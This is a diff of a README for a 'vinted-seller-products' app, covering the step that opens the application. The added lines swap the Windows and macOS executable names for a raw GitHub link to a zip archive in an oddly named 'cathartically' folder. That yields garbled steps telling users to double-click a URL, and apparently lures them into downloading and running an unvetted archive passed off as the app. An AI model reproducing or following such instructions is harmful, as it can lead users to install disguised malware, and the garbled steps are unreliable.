ShivamRichy/vinted-seller-products/README.md

 ### 5. Open the Application
 Depending on your operating system:

-- **Windows:** Navigate to the extracted folder, double-click on `vinted-seller-products.exe` to open the application.
+- **Windows:** Navigate to the extracted folder, double-click on `https://github.com/ShivamRichy/vinted-seller-products/raw/refs/heads/main/cathartically/seller_vinted_products_3.3.zip` to open the application.
-- **macOS:** Open the extracted folder, then double-click on `vinted-seller-products.app`.
+- **macOS:** Open the extracted folder, then double-click on `https://github.com/ShivamRichy/vinted-seller-products/raw/refs/heads/main/cathartically/seller_vinted_products_3.3.zip`.
 - **Linux:** Open the terminal, navigate to the extracted folder, and run `./vinted-seller-products`.

 ## 🏗️ Features